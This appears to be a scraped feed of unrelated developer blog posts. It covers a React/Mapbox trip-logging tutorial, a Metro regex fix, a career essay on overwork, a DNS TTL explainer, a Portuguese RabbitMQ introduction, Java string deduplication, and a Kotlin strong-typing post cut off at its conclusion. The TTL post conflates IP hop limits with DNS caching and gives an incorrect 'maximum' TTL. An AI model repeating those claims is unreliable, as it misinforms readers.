Let's make a submission form for the pinned map location. To do so, open the TripEntryForm component from the components folder we made previously. Import the useForm hook from react-hook-form, import createLogEntries from the api folder, and import the useState hook from the React library, since this hook lets us add state to our functional component. Unlike state in class components, useState() does not have to work with an object value; we can use primitives directly and create multiple hooks for multiple variables if necessary. Now, create two pieces of state, loading and error, and destructure register and handleSubmit from the useForm() hook of the "react-hook-form" library. After you've done that, it's time to craft our form, but first let's create a function to handle the submit request. Create an asynchronous onSubmit function and, inside it, a try-catch block. Inside the try block, set loading to true, attach the latitude and longitude from the clicked location to the form data, send the entry with createLogEntries, log the created entry, and invoke the onClose function. Inside the catch block, pass the error message to the error state, set loading back to false, and log the error. Finally, build the form inside the return statement exactly as shown in the code below.

```javascript
// components/TripEntryForm.js
import React, { useState } from "react";
import { useForm } from "react-hook-form";
import { createLogEntries } from "../../api/API";
import "./TripEntryForm.css";
const TripEntryForm = ({ location, onClose }) => {
const [loading, setLoading] = useState(false);
const [error, setError] = useState("");
const { register, handleSubmit } = useForm();
const onSubmit = async (data) => {
try {
setLoading(true);
data.latitude = location.latitude;
data.longitude = location.longitude;
const created = await createLogEntries(data);
console.log(created);
onClose();
} catch (error) {
setError(error.message);
console.error(error);
setLoading(false);
}
};
return (
<form onSubmit={handleSubmit(onSubmit)} className="trip-form">
{error ? <h3 className="error-message">{error}</h3> : null}
<label htmlFor="api_key">Enter Password</label>
<input
type="password"
name="api_key"
placeholder="For demo, password => {roadtripmap} "
required
ref={register}
/>
<label htmlFor="title">Title</label>
<input name="title" placeholder="Title" required ref={register} />
<label htmlFor="comments">Comments</label>
<textarea
name="comments"
placeholder="Comments"
rows={3}
ref={register}
></textarea>
<label htmlFor="description">Description</label>
<textarea
name="description"
placeholder="Describe your journey"
rows={4}
ref={register}
></textarea>
<label htmlFor="image">Image</label>
<input name="image" placeholder="Image URL" ref={register} />
<label htmlFor="rating">Rating (1 - 10)</label>
<input name="rating" type="number" min="0" max="10" ref={register} />
<label htmlFor="visitDate">Visit Date</label>
<input name="visitDate" type="date" required ref={register} />
<button disabled={loading}>
<span>{loading ? "Submitting..." : "Submit your Trip"}</span>
</button>
</form>
);
};
export default TripEntryForm;
```
Also, don't forget to add the TripEntryForm styles inside that same component folder: name the file TripEntryForm.css and paste in the exact CSS code mentioned below.

```css
//TripEntryForm.css
@import url("https://fonts.googleapis.com/css2?family=Fredoka+One&family=Poppins:ital,wght@0,200;0,400;1,200;1,300&family=Roboto:ital,wght@0,300;0,400;0,500;1,300;1,400;1,500&display=swap");
.trip-form label {
margin: 0.5rem 0;
display: block;
width: 100%;
color: rgb(255, 255, 255);
font-family: "Fredoka One", cursive;
}
.trip-form input {
margin: 0.5rem 0;
background-color: #2c2e41;
border-radius: 5px;
border: 0;
box-sizing: border-box;
color: rgb(255, 255, 255);
font-size: 12px;
height: 100%;
outline: 0;
padding: 10px 5px 10px 5px;
width: 100%;
font-family: "Fredoka One", cursive;
}
.trip-form textarea {
margin: 0.5rem 0;
background-color: #2c2e41;
border-radius: 5px;
border: 0;
box-sizing: border-box;
color: rgb(255, 255, 255);
font-size: 12px;
height: 100%;
outline: 0;
padding: 10px 5px 10px 5px;
width: 100%;
font-family: "Fredoka One", cursive;
}
.error-message {
color: red;
}
.trip-form button {
background-color: #fb5666;
border-radius: 12px;
border: 0;
box-sizing: border-box;
color: #eee;
cursor: pointer;
font-size: 18px;
height: 50px;
margin-top: 38px;
outline: 0;
text-align: center;
width: 100%;
}
button span {
position: relative;
z-index: 2;
}
button:after {
position: absolute;
content: "";
top: 0;
left: 0;
width: 0;
height: 100%;
transition: all 2.35s;
}
button:hover {
color: #fff;
}
button:hover:after {
width: 100%;
}
.small_description {
font-size: 60px;
}
```
Now go to this repo and download all of the SVG files that are available there.
[https://github.com/pramit-marattha/road-trip-mapper-mern-app/tree/main/client/src/assets](https://github.com/pramit-marattha/road-trip-mapper-mern-app/tree/main/client/src/assets)
After you've downloaded all of the SVG files, go to the main App component and import all of the key requirements from the libraries we installed previously, namely ReactMapGL, Marker, and Popup from "react-map-gl", along with the components and SVGs from the assets folder. Then create four pieces of state: logEntries, whose initial value is an empty array; showPopup, whose initial value is an empty object; addEntryLocation, whose default value is null; and viewport, for which you can specify an initial value exactly like the code mentioned below, or whatever you prefer. Create an asynchronous function called getEntries that calls the listLogEntries function we established earlier in the api file; its job is to retrieve all of the entries made by users and feed them into the logEntries state. Then call that function inside the useEffect() hook. By using this hook, you tell React that your component needs to do something after render.
React will remember the function you passed (we'll refer to it as our "effect") and call it later, after performing the DOM updates. Here we use the effect to fetch data, but an effect can also call any other imperative API. Placing useEffect() inside the component lets the effect access state variables (or any props) right from the function scope; we don't need a special API to read them, because hooks embrace JavaScript closures instead of introducing React-specific APIs where JavaScript already provides a solution. useEffect() is somewhat similar to the life-cycle methods we know from class components: it runs after every render, including the initial render, so it can be thought of as a combination of componentDidMount, componentDidUpdate, and componentWillUnmount. If we want to control when the effect runs (only on the initial render, or only when a particular state variable changes), we can pass in a dependencies array; the empty array used here means "run once after the first render". The hook also provides a clean-up option to allow releasing resources before the component is destroyed.
Create a function named showMarkerPopup that receives the event parameter. Inside that function, destructure the longitude and latitude from event.lngLat and pass them to the addEntryLocation state. Finally, employ all of the imported components within our return statement by simply following the code shown below.

```javascript
//src/app.js
import * as React from "react";
import { useState, useEffect } from "react";
import ReactMapGL, { Marker, Popup } from "react-map-gl";
import { listLogEntries } from "./api/API";
import MapPinLogo from "./assets/mapperPin.svg";
import MarkerPopup from "./assets/MarkerPopup.svg";
import TripEntryForm from "./components/TripEntryForm";
import ReactStars from "react-rating-stars-component";
import RoadTripNav from "./components/RoadTripNav/RoadTripNav";
const App = () => {
const [logEntries, setLogEntries] = useState([]);
const [showPopup, setShowPopup] = useState({});
const [addEntryLocation, setAddEntryLocation] = useState(null);
const [viewport, setViewport] = useState({
width: "100vw",
height: "100vh",
latitude: 27.7577,
longitude: 85.3231324,
zoom: 7,
});
const getEntries = async () => {
const logEntries = await listLogEntries();
setLogEntries(logEntries);
console.log(logEntries);
};
useEffect(() => {
getEntries();
}, []);
const showMarkerPopup = (event) => {
console.log(event.lngLat);
const [longitude, latitude] = event.lngLat;
setAddEntryLocation({
longitude,
latitude,
});
};
return (
<>
<RoadTripNav />
<ReactMapGL
{...viewport}
mapStyle="mapbox://styles/pramitmarattha/ckiovge5k3e7x17tcmydc42s3"
mapboxApiAccessToken={process.env.REACT_APP_MAPBOX_TOKEN}
onViewportChange={(nextViewport) => setViewport(nextViewport)}
onDblClick={showMarkerPopup}
>
{logEntries.map((entry) => (
<React.Fragment key={entry._id}>
<Marker latitude={entry.latitude} longitude={entry.longitude}>
<div
onClick={() =>
setShowPopup({
// ...showPopup,
[entry._id]: true,
})
}
>
<img
className="map-pin"
style={{
width: `${5 * viewport.zoom}px`,
height: `${5 * viewport.zoom}px`,
}}
src={MapPinLogo}
alt="Map Pin Logo"
/>
</div>
</Marker>
{showPopup[entry._id] ? (
<Popup
latitude={entry.latitude}
longitude={entry.longitude}
closeButton={true}
closeOnClick={false}
dynamicPosition={true}
onClose={() => setShowPopup({})}
anchor="top"
>
<div className="popup">
<ReactStars
count={10}
value={entry.rating}
size={29}
activeColor="#ffd700"
/>
<div className="popup_image">
{entry.image && <img src={entry.image} alt={entry.title} />}
</div>
<h3>{entry.title}</h3>
<p>{entry.comments}</p>
<small>
Visited :{" "}
{new Date(entry.visitDate).toLocaleDateString("en-US", {
weekday: "long",
year: "numeric",
month: "long",
day: "numeric",
})}
</small>
<p>Ratings: {entry.rating}</p>
<div className="small_description">{entry.description}</div>
</div>
</Popup>
) : null}
</React.Fragment>
))}
{addEntryLocation ? (
<>
<Marker
latitude={addEntryLocation.latitude}
longitude={addEntryLocation.longitude}
>
<div>
<img
className="map-pin"
style={{
width: `${8 * viewport.zoom}px`,
height: `${8 * viewport.zoom}px`,
}}
src={MarkerPopup}
alt="Map Pin Logo"
/>
</div>
{/* <div style={{color:"white"}}>{entry.title}</div> */}
</Marker>
<Popup
latitude={addEntryLocation.latitude}
longitude={addEntryLocation.longitude}
closeButton={true}
closeOnClick={false}
dynamicPosition={true}
onClose={() => setAddEntryLocation(null)}
anchor="top"
>
<div className="popup">
<TripEntryForm
onClose={() => {
setAddEntryLocation(null);
getEntries();
}}
location={addEntryLocation}
/>
</div>
</Popup>
</>
) : null}
</ReactMapGL>
</>
);
};
export default App;
```
The very final step is to add all of the styles to our project: go to the styles folder we established earlier and copy the following code into the index.css file.

```css
/* styles/index.css */
@import url("https://fonts.googleapis.com/css2?family=Fredoka+One&family=Poppins:ital,wght@0,200;0,400;1,200;1,300&family=Roboto:ital,wght@0,300;0,400;0,500;1,300;1,400;1,500&display=swap");
body {
margin: 0;
font-family: "Fredoka One", cursive;
height: 100vh;
width: 100vw;
overflow: hidden;
}
code {
font-family: source-code-pro, Menlo, Monaco, Consolas, "Courier New",
monospace;
}
.map-pin {
position: absolute;
transform: translate(-50%, -100%);
z-index: -1;
}
.popup {
width: 20vw;
height: auto;
padding: 1rem;
background-color: #8661d1;
border-radius: 5px;
z-index: 999;
}
.popup img {
width: 40%;
height: auto;
border-radius: 5%;
justify-content: center;
align-items: center;
margin: 0 auto;
padding-top: 1rem;
}
.popup_image {
display: flex;
justify-content: center;
align-items: center;
}
.small_description {
font-size: 1.5rem;
color: #fff;
border-radius: 5px;
z-index: 999;
}
button {
border: none;
color: #fa5252;
padding-right: 1rem;
border-radius: 50%;
font-size: 4rem;
margin-top: 0.2rem;
height: auto;
cursor: pointer;
}
```
Finally, start both the client and the server.

## Application up and running

This application's entire source code is available here.
[https://github.com/aviyeldevrel/devrel-tutorial-projects/tree/main/MERN-roadtrip-mapper](https://github.com/aviyeldevrel/devrel-tutorial-projects/tree/main/MERN-roadtrip-mapper)
Main article available here => [https://aviyel.com/post/1430](https://aviyel.com/post/1430/fullstack-road-trip-mapper-app-built-using-mern-stack?utm_source=dev_to&utm_medium=articles_project_tutorials&utm_campaign=post_1430)
Happy Coding!!
Follow [@aviyelHQ](https://twitter.com/AviyelHq) or [sign-up](https://aviyel.com/discussions) on Aviyel for early access if you are a project maintainer, contributor, or just an Open Source enthusiast.
Join Aviyel's Discord => [Aviyel's world](https://discord.gg/TbfZmbvnN5)
Twitter => [https://twitter.com/AviyelHq](https://twitter.com/AviyelHq)
| pramit_marattha |
926,055 | Answer: How to resolve the error on 'react-native start' | answer re: How to resolve the error on... | 0 | 2021-12-14T11:46:26 | https://dev.to/bilalmohib/answer-how-to-resolve-the-error-on-react-native-start-1iga | javascript, mobile, programming, node | {% stackoverflow 58122821 %}
I just got a similar error for the first time today. It appears that in \node_modules\metro-config\src\defaults\blacklist.js there is an invalid regular expression that needs to be changed. I changed the first expression under sharedBlacklist from:
```js
var sharedBlacklist = [
/node_modules[/\\]react[/\\]dist[/\\].*/,
/website\/node_modules\/.*/,
/heapCapture\/bundle\.js/,
/.*\/__tests__\/.*/
];
```
to:
```js
var sharedBlacklist = [
/node_modules[\/\\]react[\/\\]dist[\/\\].*/,
/website\/node_modules\/.*/,
/heapCapture\/bundle\.js/,
/.*\/__tests__\/.*/
];
```
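If you want to confirm the corrected pattern before restarting Metro, this small standalone check (not part of the fix itself) verifies that it compiles and matches a typical path:

```javascript
// Corrected pattern from the answer above, with escaped forward slashes
// inside the character classes.
const pattern = /node_modules[\/\\]react[\/\\]dist[\/\\].*/;

console.log(pattern.test("node_modules/react/dist/react.js")); // true
console.log(pattern.test("src/App.js"));                       // false
```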
Copied from https://stackoverflow.com/a/58122821/13161180
Credit goes to Clem | bilalmohib |
937,264 | The Weekly Dev - 202152 | "The Weekly Dev" cares about technical solutions (namely: software) that are hackable and enable a... | 0 | 2021-12-27T07:35:46 | https://kevwe.com/weekly/202152 | ---
title: The Weekly Dev - 202152
published: true
description:
tags:
//cover_image: https://direct_url_to_image.jpg
canonical_url: 'https://kevwe.com/weekly/202152'
---
"The Weekly Dev" cares about technical solutions (namely: software) that are hackable and enable a deeper level of understanding.
We don't want to 'be used' by our software, nor by software (cloud?) companies. We want to be on top of it, able to interact and mess with the code.
The resources that have caught our attention at this time:
https://kevwe.com/weekly/202152
| madunixman | |
937,756 | How I made workplace toxic | Photo by Kyle Nieber on Unsplash It's been six years since I left my job at a startup where I worked... | 0 | 2021-12-27T17:55:33 | https://dev.to/this-is-learning/how-i-made-workplace-toxic-1ici | career, workplace, toxic | Photo by <a href="https://unsplash.com/@kylenieber?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Kyle Nieber</a> on <a href="https://unsplash.com/?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Unsplash</a>
It's been six years since I left my job at a startup where I worked for around five years. I have a lot of good memories, bad ones too. But I think about this one thing a lot, how I made that workplace toxic. It was unintentional. So here is the story, and I hope you don't make the same mistake.
## Initial Days
After I completed college, I had one thing clear in my mind: I would never work more than 8 hours a day. I even left my first job because my CEO made me work till 10 pm one day; it was one day in the 8 months I worked there, but somehow he believed that if you want to grow, you need to work 10+ hours daily (which is false). Even in my 2nd job, I let my manager know not to expect me to work more than 8 hours when he asked me why bugs were still not resolved in one day (yeah, that was his expectation).
## The Story
Now let's get back to what I did, which I think was wrong and made the workplace more toxic.
In the initial three years of my career, I had hardly done any real work. I worked for four organizations, and by Aug 2011, I joined my 5th organization. I wanted some work, wanted to learn and grow. And before you ask, no, I had no idea about Open Source and could not afford a computer for myself.
## How it started
The business was related to fintech, and it was a 3-year-old startup and had too many exciting problems to solve.
Suddenly, I could see I had some interesting problems to solve, and no one took responsibility for them. There was only one problem, though: time.
So the next thing I did was start putting in more hours; I began working 10+ hours a day. No one asked me to do that. I was selfish: I wanted to grow, and I wanted to grow faster, to make up for the last three years I had lost not learning new things.
Suddenly, it paid off, in the wrong way. Within a year, I had the opportunity to lead our Production Support team. It was a 6-7 people team. I am proud of the work we did together.
Even after having the team, I kept working those extra hours. Still, no one asked me to do that, and I never asked my team to stay longer in the office.
But my example had a bad influence on them; yes, this is where everything went wrong. Suddenly, my team started working more hours, and on many occasions, we even worked for days.
Working more hours suddenly became a thing; no one asked for it; I started it, and now I think it became Business As Usual for the organization. My team size increased from 7 to 32 in the next three years, and I was still doing it, making the workplace more toxic.
## What's the worst I did
I remember I organized a two-day "die till you code" event in the name of an internal hackathon. The idea was to close as many issues as possible, which we received as part of Production Support.
## Why I think about it
I was the one who wanted to grow, the selfish one. I thought it would not impact anyone, but in the years that followed, I could see the damage I had done. Suddenly my team and many other teams started working more hours; 8 pm felt like normal time, and no one used to leave.
Expectations for all teams were at an all-time high, and developers were expected to deliver everything in a short period.
## What I could have done differently
I could have been less selfish. I could have made sure that working more hours would not become a trend, but I did the opposite. I was young, reckless, had so much energy, wanted to solve all the issues and make sure I grew faster, which I did, by being selfish.
## Why I am sharing this
I can see many developers are following the same trend for different reasons.
* "If I stay in the office for more hours, I will get an early promotion by showing my manager that I work a lot."
* Rings a bell? Yes, this is pretty common; by doing this, you make sure the place becomes toxic for people who want to finish their work and leave.
* "I worked for 10+ hours as a developer, so my team should do the same."
* Yes, an actual incident; many managers in India follow this just because they were asked to work 10+ hours daily when they were developers.
## Conclusion
I am not saying don't ever work extra hours; sometimes it happens, and it's almost unavoidable. After leaving that startup, my rule has been to say no when asked to work extra hours. It has paid off: in the more than six years since, I have never worked more than 8 hours a day for my employer.
You can do that too: start saying "no" to unexpected deadlines, and become less selfish about work. Stop spending unnecessary time in the office when no one asks you to.
In case you have a similar story, I would love to hear from you; tag me on [Twitter](https://twitter.com/SantoshYadavDev)
| santoshyadavdev |
939,743 | What is DNS TTL (Time To Live)? | What is time-to-live (TTL)? Time-to-live (TTL) is a value for the period of time that a... | 0 | 2021-12-29T17:41:55 | https://dev.to/s3cloudhub/what-is-dns-ttl-time-to-live-g87 | dns, ttl, route53, aws | ## What is time-to-live (TTL)?
Time-to-live (TTL) is a value for the period of time that a packet, or data, should exist on a computer or network before being discarded.
The meaning of TTL, or packet lifetime, depends on the context. For example, TTL is a value in an Internet Protocol (IP) packet that tells a network router when the packet has been in the network too long and should be discarded.
Here's the full video along with a hands-on demo that's based on TTL (time-to-live)👇👇
[](https://www.youtube.com/watch?v=QEmjX9OaGyU)
## How Does TTL Work?
TTL's basic function revolves around managing information packets in relation to DNS requests. When one of these packets is created and transmitted through the internet, there is a chance that it will pass, continuously, from router to router forever. To prevent this from happening, each packet has a specific TTL or hop limit. It is also possible to examine the TTL log of a data packet to obtain information on how it has moved through the internet over the course of its travels.
Within each packet, there is a specified place where the TTL value is stored. This is a numerical value, and it indicates how much longer the packet should move around the internet. When a router receives a data packet, it takes away one unit from the TTL count before sending it on to the next destination within the network. This continues to happen until the TTL count within the packet drops all the way down to zero.
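The decrement-and-discard rule described above can be sketched in a few lines. This is a toy model for illustration, not real router code:

```python
def survives(ttl: int, hops: int) -> bool:
    """Toy model of the decrement-and-discard rule: every router the
    packet crosses subtracts one from the TTL, and the packet is
    dropped the moment the counter hits zero."""
    for _ in range(hops):
        ttl -= 1
        if ttl <= 0:
            return False  # the router discards the packet here
    return True

print(survives(ttl=64, hops=12))  # True: a typical default TTL easily covers 12 hops
print(survives(ttl=3, hops=5))    # False: dropped at the third router
```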
## What is time-to-live in HTTP?
In Hypertext Transfer Protocol (HTTP), time-to-live describes the number of seconds it takes for cached web content to return before the webserver has to check again to ensure that the content is "fresh."
Settings on the web server define a default value, but it can be overridden in the HTML page headers: cache-control tags define which kinds of servers, if any, may cache the data, and expires tags specify the date and time at which the content becomes stale.
## What Are TTL Values?
When you set TTL values for your website, you choose a value in seconds. For example, a TTL value of 600 is the equivalent of 600 seconds or ten minutes.
The minimum available TTL is usually 30, equivalent to 30 seconds. You could theoretically set a TTL as low as one second. However, most sites use a default TTL of 3600 (one hour). The maximum TTL that you can apply is 86,400 (24 hours).
Technically, you can set any TTL value between the minimum and maximum parameters. Later in this article, we’ll discuss how you can choose the best time to live value for your site.
## How Should You Choose a TTL?
Deciding on a suitable TTL for your needs can be challenging. Fortunately, there are some general guidelines that you can follow to see what fits your site best.
We recommend a TTL of 1-24 hours for most sites. Remember that TTL values are measured in seconds, so this is the equivalent of 3,600 to 86,400 seconds.
This TTL value can reduce loading time, which improves the user experience for your visitors and can decrease your bounce rate. "The longer, the better" is a general rule, but remember to schedule any website maintenance accordingly.
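As an illustration of what a resolver or CDN does with these values, here is a minimal sketch of TTL-based caching. The domain and record values below are made-up examples:

```python
import time

class TTLCache:
    """Minimal sketch of DNS-resolver-style caching: a record is served
    from cache until its TTL (in seconds) elapses, then it must be
    re-resolved."""

    def __init__(self):
        self._store = {}  # name -> (value, expires_at)

    def put(self, name, value, ttl, now=None):
        now = time.time() if now is None else now
        self._store[name] = (value, now + ttl)

    def get(self, name, now=None):
        now = time.time() if now is None else now
        entry = self._store.get(name)
        if entry is None:
            return None
        value, expires_at = entry
        if now >= expires_at:  # record is stale: evict and force a re-resolve
            del self._store[name]
            return None
        return value

cache = TTLCache()
cache.put("example.com", "93.184.216.34", ttl=3600, now=0)
print(cache.get("example.com", now=600))   # served from cache (10 minutes in)
print(cache.get("example.com", now=4000))  # None: TTL expired, must re-resolve
```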
---
▬▬▬▬▬▬ WANT TO LEARN MORE? ▬▬▬▬▬▬
Full Terraform tutorial ► [https://bit.ly/2GwK8V2](https://bit.ly/2GwK8V2)
DevOps Tools, like Ansible ► [https://bit.ly/3iASHuP](https://bit.ly/3iASHuP)
Docker Tutorial ► [https://bit.ly/3iAT9Jx](https://bit.ly/3iAT9Jx) | s3cloudhub |
1,414,198 | What is RabbitMQ and what is its role in programming? | RabbitMQ is open-source messaging software that allows applications to communicate with each... | 0 | 2023-03-25T00:59:41 | https://dev.to/gabrielgcj/o-que-e-rabbitmq-e-qual-sua-funcao-na-programacao-468j | RabbitMQ is open-source messaging software that allows applications to communicate with each other using message queues. It was originally developed in Erlang by Rabbit Technologies Ltd. and is now maintained by Pivotal Software, Inc.
Messages in RabbitMQ are sent to queues and consumed by applications. Applications can produce or consume messages. A producer is an application that sends messages to the queue, while a consumer is an application that receives messages from the queue.
There are four main components in RabbitMQ:
1- The **producer**
2- The **queue**
3- The **exchange**
4- The **consumer**
The producer sends messages to the exchange, which forwards them to the queue. The consumer receives the messages from the queue. There are different types of exchanges, which determine how messages are routed to the queues.
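The producer → exchange → queue → consumer flow can be sketched with a toy in-memory model of a direct exchange. This is an illustration only; real RabbitMQ clients speak AMQP to a broker instead:

```python
from collections import defaultdict, deque

class DirectExchange:
    """Toy model of a direct exchange: messages are copied into every
    queue bound to the exact routing key, and consumers drain queues."""

    def __init__(self):
        self.bindings = defaultdict(list)  # routing key -> bound queue names
        self.queues = defaultdict(deque)   # queue name -> pending messages

    def bind(self, queue, routing_key):
        self.bindings[routing_key].append(queue)

    def publish(self, routing_key, message):
        # the exchange copies the message into every queue bound to the key
        for queue in self.bindings[routing_key]:
            self.queues[queue].append(message)

    def consume(self, queue):
        # a consumer takes the oldest pending message from its queue
        return self.queues[queue].popleft() if self.queues[queue] else None

ex = DirectExchange()
ex.bind("invoices", routing_key="order.paid")
ex.publish("order.paid", {"order_id": 42})
print(ex.consume("invoices"))  # {'order_id': 42}
print(ex.consume("invoices"))  # None: the queue is empty again
```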
**What is an exchange?**
An exchange is a fundamental component of RabbitMQ's messaging architecture. It is responsible for routing the messages received from a producer to one or more consumer queues.
When a producer sends a message to RabbitMQ, it specifies the name of the exchange and a routing key. The exchange, in turn, uses the routing key to determine which consumer queue or queues should receive the message.
There are four types of exchanges in RabbitMQ:
**Direct**: routes messages to a queue based on an exact routing key defined by the producer.
**Topic**: routes messages to queues based on routing-key patterns, allowing messages to be delivered to multiple queues that match the pattern.
**Headers**: routes messages to queues based on message attributes defined by the producer, such as content type or language code.
**Fanout**: routes messages to all queues bound to the exchange.
Exchanges are created and configured by RabbitMQ administrators, usually through a command-line client or a graphical interface. Consumer queues are bound to an exchange, allowing messages to be delivered reliably to their recipients.
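The topic-exchange wildcards (`*` matches exactly one dot-separated word, `#` matches zero or more words) can be illustrated with a small matcher. The semantics mirror RabbitMQ's documented topic rules, but this is a plain-Python sketch, not RabbitMQ code:

```python
def topic_matches(pattern: str, routing_key: str) -> bool:
    """Check a binding pattern against a routing key using topic-exchange
    semantics: '*' matches exactly one word, '#' matches zero or more."""
    def match(p, k):
        if not p:
            return not k          # both exhausted -> match
        head, rest = p[0], p[1:]
        if head == '#':
            # '#' may absorb zero or more words of the key
            return any(match(rest, k[i:]) for i in range(len(k) + 1))
        if not k:
            return False
        if head == '*' or head == k[0]:
            return match(rest, k[1:])
        return False
    return match(pattern.split('.'), routing_key.split('.'))

print(topic_matches("orders.*.created", "orders.eu.created"))  # True
print(topic_matches("orders.#", "orders.eu.created.v2"))       # True
print(topic_matches("orders.*", "orders.eu.created"))          # False: '*' is one word only
```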
RabbitMQ is highly scalable and can handle large volumes of messages. It supports several messaging protocols, including:
**AMQP** (Advanced Message Queuing Protocol)
**MQTT** (Message Queuing Telemetry Transport)
**STOMP** (Simple Text Oriented Messaging Protocol)
In addition, RabbitMQ offers security features such as user authentication and authorization.
RabbitMQ is widely used in distributed and cloud applications for communication between microservices. It is also used in real-time data processing systems and IoT (Internet of Things) applications. RabbitMQ is popular with programming languages such as Java, Python, and Ruby.
In summary, RabbitMQ is a scalable and flexible messaging technology that allows applications to communicate efficiently and securely. It is widely used in distributed and cloud applications, as well as in real-time data processing systems and IoT applications. RabbitMQ offers client libraries for several programming languages and advanced features for customization and scalability.
| gabrielgcj | |
956,943 | java traditional method to remove duplicate String | I just saw a post in dev someone solved same problem using collections in java. so i thought let me... | 0 | 2022-01-16T05:09:07 | https://dev.to/riyas07/java-core-method-to-remove-duplicate-string-6o8 | java, beginners, programming, tutorial | I just saw a post on DEV where someone solved the same problem using collections in Java, so I thought: let me try to solve the same problem the traditional way.
```java
public class Main {
    public static void main(String[] args) {
        String s = "abbvcddgtttt"; // note: ' ' is used as a sentinel below, so the input must not contain spaces
        char c[] = s.toCharArray();
        char cc[] = new char[c.length];
        int index = 0;
        for (int i = 0; i < c.length; i++) {
            // blank out this character if the same character appears again later
            for (int j = i + 1; j < c.length; j++) {
                if (c[i] == c[j]) {
                    c[i] = ' ';
                }
            }
            // keep only the characters that were not blanked out
            if (c[i] != ' ') {
                cc[index] = c[i];
                index++;
            }
        }
        // print only the filled part of cc, not the unused '\0' slots
        for (int i = 0; i < index; i++) {
            System.out.println(cc[i]);
        }
    }
}
```
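For comparison, the collections-based approach the post mentions can be sketched with a `LinkedHashSet`, which keeps insertion order while rejecting duplicates. Note it keeps the first occurrence of each character (the loop above effectively keeps the last), which happens to give the same result for this input:

```java
import java.util.LinkedHashSet;
import java.util.Set;

public class Dedupe {
    static String removeDuplicates(String s) {
        // LinkedHashSet preserves insertion order and ignores repeated adds
        Set<Character> seen = new LinkedHashSet<>();
        for (char c : s.toCharArray()) {
            seen.add(c);
        }
        StringBuilder sb = new StringBuilder();
        for (char c : seen) {
            sb.append(c);
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println(removeDuplicates("abbvcddgtttt")); // abvcdgt
    }
}
```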
| riyas07 |
994,795 | Avoiding Stringly-typed in Kotlin | A couple of years ago, I developed an application in Kotlin based on Camunda BPMN to help me manage... | 0 | 2022-02-20T16:53:35 | https://blog.frankel.ch/avoid-stringly-typed-kotlin/ | kotlin, typesystem, strongtyping, api | A couple of years ago, I developed an application in Kotlin based on Camunda <abbr title="Business Process Management Notation">BPMN</abbr> to help me manage my conference submission workflow. It tracks my submissions in Trello and synchronizes them on Google Calendar and in a Google Sheet. Google Calendar offers a REST API. As REST APIs go, it's cluttered with `String` everywhere. Here's an excerpt of the code:
```kotlin
fun execute(color: String, availability: String) {
findCalendarEntry(client, google, execution.conference)?.let {
it.colorId = color // 1
it.transparency = availability // 2
client.events()
.update(google.calendarId, it.id, it).execute()
}
}
```
1. Set the event's color. Valid values are "0", "1", ... to "11"
2. Set the event's availability. Valid values are `"transparent"` and `"opaque"`
However, my experience has taught me to favor strong typing. I also want to avoid typos. I want to list some alternatives to using `String` in this post.
## Constants
The oldest trick in the book, available in most languages, is to define constants. Before Java 5, developers used this alternative *a lot* as it was the only one available. It would look like this:
```kotlin
const val Default = "0"
const val Blue = "1"
const val Green = "2"
const val Free = "transparent"
const val Busy = "opaque"
```
We can now call the function accordingly:
```kotlin
execute(Blue, Busy)
```
Constants help with typos. The flip side is that they cannot enforce strong typing:
```kotlin
execute(Blue, Green) // 1
execute(Free, Green) // 2
```
1. Pass two colors, but the compiler is fine
2. Invert the arguments; the compiler is still fine
## Type aliases
The idea behind type aliases is to alias the name of an existing type to something more meaningful.
```kotlin
typealias Color = String
typealias Availability = String
```
With this, we can change the signature of the function:
```kotlin
fun execute(color: Color, availability: Availability) {
// ...
}
```
Unfortunately, type aliases are just cosmetic. Whatever the alias, a `String` stays a `String`. We can still write incorrect code:
```kotlin
execute(Blue, Green) // 1
execute(Free, Green) // 1
```
1. Nothing has improved
## Enumerations
Whether in Java or Kotlin, enumerations are the first step toward strong typing. I believe most developers know about them. Let's change our code to use enums:
```kotlin
enum class Color(val id: String) {
Default("0"),
Blue("1"),
Green("2"),
}
enum class Availability(val value: String) {
Free("transparent"),
Busy("opaque"),
}
```
We need to change the function accordingly, both the signature and the implementation:
```kotlin
fun execute(color: Color, availability: Availability) {
findCalendarEntry(client, google, execution.conference)?.let {
it.colorId = color.id // 1
it.transparency = availability.value // 1
client.events()
.update(google.calendarId, it.id, it).execute()
}
}
```
1. Extract the value wrapped by the `enum`
The usage of enumerations enforces strong-typing:
```kotlin
execute(Color.Blue, Availability.Busy) // 1
execute(Color.Blue, Color.Green) // 2
execute(Availability.Free, Color.Blue) // 2
```
1. Compile
2. Doesn't compile!
## Inline classes
A recent Kotlin feature is fully dedicated to strong typing: inline classes. An inline class wraps a single "primitive" value, such as `Int` or `String`. Picture the following class:
```kotlin
data class Person(val givenName: String, val familyName: String)
```
Callers of this class would have to remember whether the first parameter is the given name or the family name. Kotlin already helps by allowing named parameters:
```kotlin
val p = Person(givenName = "John", familyName = "Doe")
```
However, we can improve the snippet above by wrapping the `String` in two different value types, one for each role.
```kotlin
@JvmInline value class GivenName(val value: String)
@JvmInline value class FamilyName(val value: String)
val p = Person(GivenName("John"), FamilyName("Doe"))
```
At this point, one cannot swap a given name for a family name, or _vice versa_. Likewise, we can use value classes in our example and define possible values in a companion object.
```kotlin
@JvmInline
value class Color(val id: String) {
companion object {
val Default = Color("0")
val Blue = Color("1")
val Green = Color("2")
}
}
@JvmInline
value class Availability(val value: String) {
companion object {
val Free = Availability("transparent")
val Busy = Availability("opaque")
}
}
execute(Color.Blue, Availability.Busy) // 1
execute(Color.Blue, Color.Green) // 2
execute(Availability.Free, Color.Blue) // 2
```
1. Compile
2. Doesn't compile!
## Sealed classes
Sealed classes are another possible way to enforce strong typing. The limitation is we need to define all subclasses of a sealed class in the same package. There can't be any inheritance by third parties. In effect, it makes the class `open` for your code and `final` for client code.
Instead of defining a type and several instances of it as in value classes, we define the different types directly.
```kotlin
sealed class Color(val id: String) {
object Default: Color("0")
object Blue: Color("1")
object Green: Color("2")
}
sealed class Availability(val value: String) {
object Free : Availability("transparent")
object Busy : Availability("opaque")
}
execute(Color.Blue, Availability.Busy) // 1
execute(Color.Blue, Color.Green) // 2
execute(Availability.Free, Color.Blue) // 2
```
1. Compile
2. Doesn't compile!
Note that I defined the objects in their respective parent classes. Depending on your context, you may want to make them top-level instead.
```kotlin
sealed class Color(val id: String)
object Default: Color("0")
object Blue: Color("1")
object Green: Color("2")
sealed class Availability(val value: String)
object Free : Availability("transparent")
object Busy : Availability("opaque")
execute(Blue, Busy)
```
## Conclusion
